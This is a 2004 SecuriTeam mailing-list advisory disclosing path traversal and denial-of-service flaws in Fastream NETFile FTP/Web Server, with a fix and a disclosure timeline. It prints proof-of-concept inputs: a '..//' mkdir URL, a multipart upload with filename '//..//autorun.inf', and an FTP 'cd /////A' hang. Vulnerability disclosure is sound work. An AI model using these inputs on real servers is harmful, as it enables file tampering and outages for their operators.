Date: 4 Jul 2004 18:45:52 +0200
From: SecuriTeam <[email protected]>
To: [email protected]Subject: [NT] Fastream NETFile FTP/Web Server Input validation Errors
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Fastream NETFile FTP/Web Server Input validation Errors
------------------------------------------------------------------------
SUMMARY
Fastream NETFile Server is "a secure FTP server and Web server combined
together in one application. Our claim is that it is the easiest to setup
and use server on the Internet". Two security vulnerabilities in the
Fastream NETFile allow a remote attacker to either write to files that
reside outside the bounding HTTP root directory or to cause a denial of
service against.
DETAILS
Vulnerable Systems:
* Fastream NETFile FTP/Web Server version 6.7.2.1085 and prior
Immune Systems:
* Fastream NETFile FTP/Web Server version 6.7.3.1086
There are some input validation errors in Fastream NETFile that allow
users to bypass the root directory restrictions. It is easy to exploit
this vulnerability and compromise the system because Fastream NETFile
allows remote users to upload/create/delete files in the application
directory. Another vulnerability exists in the way that NETFile handles
some URLs. After requesting a special crafted directory it's possible to
cause a 1 minute Denial of Service.
Exploit code:
The problem is in the way that NETFile handles two Slashes.
Example URL:
http://HOST:PORT/?command=mkdir&filename=..//FOLDER_IS_OUTSIDE_THE_ROOT_DIRECTORY
C:\>dir FOLDE*
Volume in drive C is W2000P
Volume Serial Number is xxxx-xxxx
Directory of C:\
07/03/2004 07:47p <DIR>
FOLDER_IS_OUTSIDE_THE_ROOT_DIRECTORY
0 File(s) 0 bytes
1 Dir(s) 119,015,936 bytes free
NETFile allows some other methods in the "command" parameter that could be
used to create/delete folders/files outside the root directory.
To exploit the upload files vulnerability we need to take a look to the
data sent in the POST request:
-----------------------------7d42c98700ea
Content-Disposition: form-data; name="upfile"; filename="D:\foo.txt"
Content-Type: text/plain
THIS IS AN EXAMPLE
-----------------------------7d42c98700ea--
Its possible for an attacker to modify the filename parameter to something
like: Filename="//..//autorun.inf" and place malicious files in the
system, or overwrite existing files.
Seems that the FTP Server is not vulnerable to this issue and transversal
directory attacks are not possible, but there is another bug that allows
malicious users to cause a denial of service by executing the following
command:
D:\>ftp localhost
Connected to at4r.intranet.
220 Fastream NETFile FTP Server Ready
User (at4r.intranet:(none)): ftp
331 Password required for ftp.
Password:
230 User ftp logged in.
ftp> cd /////A <-- here the ftp server hangs for a lot of time
599 No such directory.
ftp>
Solution:
The best solution is to upgrade the software to version 6.7.3 that was
released by vendor 3 July 2004. Another way to minimize the impact of this
vulnerability is to store the root directory of Fastream NETFile server in
other partition and remove create/delete file and directory permissions
from all users, included Guest accounts.
Disclosure Timeline:
3 July, 2004: Vendor Contacted.
3 July, 2004: Issue Fixed after 2 hours. New release 6.7.3 available
4 July, 2004: Public Disclosure
ADDITIONAL INFORMATION
The information has been provided by <mailto:[email protected]> at4r.
The original article can be found at:
<http://www.haxorcitos.com/Fastream_advisory.txt>;
http://www.haxorcitos.com/Fastream_advisory.txt
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
